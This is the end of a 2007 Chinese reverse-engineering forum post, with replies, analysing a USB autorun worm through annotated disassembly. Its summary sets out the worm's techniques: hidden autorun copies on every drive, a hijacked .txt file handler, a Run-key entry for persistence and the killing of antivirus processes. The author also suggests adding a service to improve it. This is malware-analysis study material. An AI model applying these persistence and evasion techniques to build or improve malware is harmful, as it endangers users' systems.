0041399C . |8D8D 7CFBFFFF LEA ECX,DWORD PTR SS:[EBP-484]          ; |
004139A2 . |51          PUSH ECX                               ; |pMsg
004139A3 . |FF15 68144300 CALL DWORD PTR DS:[<&USER32.GetMessageA>>; \GetMessageA
004139A9 . |3BF4       CMP ESI,ESP                            ;  我估计现在病毒开始搞破坏了
004139AB . |E8 302EFFFF CALL reper.004067E0                   ;  经过我的分析判断，这是在枚举进程！看看有没有对他有威胁的
004139B0 . |85C0       TEST EAX,EAX                            ;  根据我以前的病毒分析，他是在找“木马” “杀” 之类的词语……
004139B2 . |74 56       JE SHORT reper.00413A0A
004139B4 . |8BF4       MOV ESI,ESP
004139B6 . |8D95 7CFBFFFF LEA EDX,DWORD PTR SS:[EBP-484]
004139BC . |52          PUSH EDX                               ; /pMsg
004139BD . |8B85 78FBFFFF MOV EAX,DWORD PTR SS:[EBP-488]          ; |
004139C3 . |50          PUSH EAX                               ; |hAccel
004139C4 . |8B8D 7CFBFFFF MOV ECX,DWORD PTR SS:[EBP-484]          ; |
004139CA . |51          PUSH ECX                               ; |hWnd
004139CB . |FF15 6C144300 CALL DWORD PTR DS:[<&USER32.TranslateAcc>; \TranslateAcceleratorA
004139D1 . |3BF4       CMP ESI,ESP
004139D3 . |E8 082EFFFF CALL reper.004067E0
004139D8 . |85C0       TEST EAX,EAX
004139DA . |75 2C       JNZ SHORT reper.00413A08
004139DC . |8BF4       MOV ESI,ESP
004139DE . |8D95 7CFBFFFF LEA EDX,DWORD PTR SS:[EBP-484]
004139E4 . |52          PUSH EDX                               ; /pMsg
004139E5 . |FF15 70144300 CALL DWORD PTR DS:[<&USER32.TranslateMes>; \TranslateMessage //发送EXIT的MESSAGE？
004139EB . |3BF4       CMP ESI,ESP
004139ED . |E8 EE2DFFFF CALL reper.004067E0
004139F2 . |8BF4       MOV ESI,ESP
004139F4 . |8D85 7CFBFFFF LEA EAX,DWORD PTR SS:[EBP-484]
004139FA . |50          PUSH EAX                               ; /pMsg
004139FB . |FF15 74144300 CALL DWORD PTR DS:[<&USER32.DispatchMess>; \DispatchMessageA
00413A01 . |3BF4       CMP ESI,ESP
00413A03 . |E8 D82DFFFF CALL reper.004067E0
00413A08 >^\EB 8A       JMP SHORT reper.00413994
00413A0A >  8B85 84FBFFFF MOV EAX,DWORD PTR SS:[EBP-47C]
00413A10 >  5F          POP EDI
00413A11 .  5E          POP ESI
00413A12 .  5B          POP EBX
00413A13 .  81C4 C8040000 ADD ESP,4C8
00413A19 .  3BEC       CMP EBP,ESP
00413A1B .  E8 C02DFFFF CALL reper.004067E0
00413A20 .  8BE5       MOV ESP,EBP
00413A22 .  5D          POP EBP
00413A23 .  C2 1000    RETN 10

总结一下，病毒首先判断各盘有没有AUTORUN，有则KILL掉，
然后再在各盘创建REPER.EXE和AUTORUN.INF，设置属性，系统，只读，隐藏
再来在C:\WINDOWS下创建VIEREW.EXE和N0TEPAD.EXE，为每次启动和TXT做准备
然后改注册表，在HEKY_CALSSES_BOOT\txtfile\shell\open\command下面的NOTEPAD改成自己的N0TEPAD.EXE,
再在Software\Microsoft\Windows\CurrentVersion\Run下创建RUNREPER项，让自己的VIEREW.EXE时时刻刻启动……
最后再枚举杀毒软件的API，有就CUT掉……

这回分析地很透彻了吧：）
一个普通的U盘病毒，同志们谁牛自己研究熊猫去，我不敢：）
=======================:>我是可爱的分隔线<:=============================
斑竹您要是+精（我都不敢说了……上次CCD狠狠地把我给DEBUG了一回……）还是把我的声望弄到10吧……
看了看高手的破文，比我好多了……努力吧~自己……
=======================:>我是可爱的分隔线<:=============================
Qbasic:
CLS
INPUT "Your Name,Please:",n$
PRINT CHR$(68)+CHR$(101)+CHR$(66)+CHR$(117)+CHR$(103)+CHR$(32)+CHR$(89)+CHR$(111)+CHR$(117)+CHR$(114)+CHR$(115)+CHR$(101)+CHR$(108)+CHR$(102)+"-----"+n$+CHR$(33)+CHR$(58)+CHR$(41)+CHR$(66)+CHR$(121)+CHR$(32)+CHR$(78)+CHR$(111)+CHR$(78)+CHR$(97)+CHR$(109)+CHR$(101)+CHR$(83)+CHR$(119)+CHR$(111)+CHR$(114)+CHR$(100)+CHR$(77)+ CHR$(97)+CHR$(110)
END
Vbasic:
n$ = InputBox("Your Name,Please:")
Print Chr$(68) + Chr$(101) + Chr$(66) + Chr$(117) + Chr$(103) + Chr$(32) + Chr$(89) + Chr$(111) + Chr$(117) + Chr$(114) + Chr$(115) + Chr$(101) + Chr$(108) + Chr$(102) + "-----" + n$ + Chr$(33) + Chr$(58) + Chr$(41) + Chr$(66) + Chr$(121) + Chr$(32) + Chr$(78) + Chr$(111) + Chr$(78) + Chr$(97) + Chr$(109) + Chr$(101) + Chr$(83) + Chr$(119) + Chr$(111) + Chr$(114) + Chr$(100) + Chr$(77) + Chr$(97) + Chr$(110)
Please Wait for Pascal.....Today is too late,so I don't want to qj them.....
=======================:>我是可爱的分隔线<:=============================
另：这个病毒的制作思路不好，应该+个服务：）
（而且经实验，没什么威力，就是传染……）

[课程]Android-CTF解题方法汇总！

收藏・1

免费・0

支持

最新回复 (7)
yijun8354 雪币： 1919 活跃值： (901) 能力值： ( LV9，RANK：490 ) 在线值：发帖 22 回帖 784 粉丝 1 关注私信	yijun8354 12 2 楼学习哈~~ 2007-6-12 20:01 0
NONAME剑人雪币： 740 活跃值： (952) 能力值： ( LV9，RANK：160 ) 在线值：发帖 59 回帖 407 粉丝 13 关注私信	NONAME剑人 3 3 楼又加了一点注释 2007-6-13 18:55 0
蓝莲花雪币： 200 能力值： (RANK：10 ) 在线值：发帖 0 回帖 44 粉丝 0 关注私信	蓝莲花 4 楼厉害呀！学习了，给你加分！ 2007-6-13 19:23 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 21 关注私信	笨笨雄 14 5 楼一般鼓励静态分析病毒的...调试器用于脱壳... 2007-6-13 19:52 0
NONAME剑人雪币： 740 活跃值： (952) 能力值： ( LV9，RANK：160 ) 在线值：发帖 59 回帖 407 粉丝 13 关注私信	NONAME剑人 3 6 楼谢谢蓝莲花和笨笨雄了：）我会更加努力的…… PS：静态分析主要没有API大全……好多API不知道什么意思：）就动态了 2007-6-13 20:43 0
蓝莲花雪币： 200 能力值： (RANK：10 ) 在线值：发帖 0 回帖 44 粉丝 0 关注私信	蓝莲花 7 楼不客气！加油，不久的将来你一定会成为一代大牛的！你的cm我玩过，很有趣味的！ 2007-6-13 21:21 0
NONAME剑人雪币： 740 活跃值： (952) 能力值： ( LV9，RANK：160 ) 在线值：发帖 59 回帖 407 粉丝 13 关注私信	NONAME剑人 3 8 楼那个CM还是太简陋了,我有个CM,可惜是电信才能发上来,所以我发到自己的论坛了:) 有兴趣来玩玩:) 我不知到你玩的是哪个,我的时间CRACKME是: http://cracknow.5d6d.com/thread-1-1-1.html USERNAME: PEDIY.COM PASSWORD: 888888 2007-6-14 15:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

NONAME剑人

发帖

407

回帖

160

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (7)
yijun8354 雪币： 1919 活跃值： (901) 能力值： ( LV9，RANK：490 ) 在线值：发帖 22 回帖 784 粉丝 1 关注私信	yijun8354 12 2 楼学习哈~~ 2007-6-12 20:01 0
NONAME剑人雪币： 740 活跃值： (952) 能力值： ( LV9，RANK：160 ) 在线值：发帖 59 回帖 407 粉丝 13 关注私信	NONAME剑人 3 3 楼又加了一点注释 2007-6-13 18:55 0
蓝莲花雪币： 200 能力值： (RANK：10 ) 在线值：发帖 0 回帖 44 粉丝 0 关注私信	蓝莲花 4 楼厉害呀！学习了，给你加分！ 2007-6-13 19:23 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 21 关注私信	笨笨雄 14 5 楼一般鼓励静态分析病毒的...调试器用于脱壳... 2007-6-13 19:52 0
NONAME剑人雪币： 740 活跃值： (952) 能力值： ( LV9，RANK：160 ) 在线值：发帖 59 回帖 407 粉丝 13 关注私信	NONAME剑人 3 6 楼谢谢蓝莲花和笨笨雄了：）我会更加努力的…… PS：静态分析主要没有API大全……好多API不知道什么意思：）就动态了 2007-6-13 20:43 0
蓝莲花雪币： 200 能力值： (RANK：10 ) 在线值：发帖 0 回帖 44 粉丝 0 关注私信	蓝莲花 7 楼不客气！加油，不久的将来你一定会成为一代大牛的！你的cm我玩过，很有趣味的！ 2007-6-13 21:21 0
NONAME剑人雪币： 740 活跃值： (952) 能力值： ( LV9，RANK：160 ) 在线值：发帖 59 回帖 407 粉丝 13 关注私信	NONAME剑人 3 8 楼那个CM还是太简陋了,我有个CM,可惜是电信才能发上来,所以我发到自己的论坛了:) 有兴趣来玩玩:) 我不知到你玩的是哪个,我的时间CRACKME是: http://cracknow.5d6d.com/thread-1-1-1.html USERNAME: PEDIY.COM PASSWORD: 888888 2007-6-14 15:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复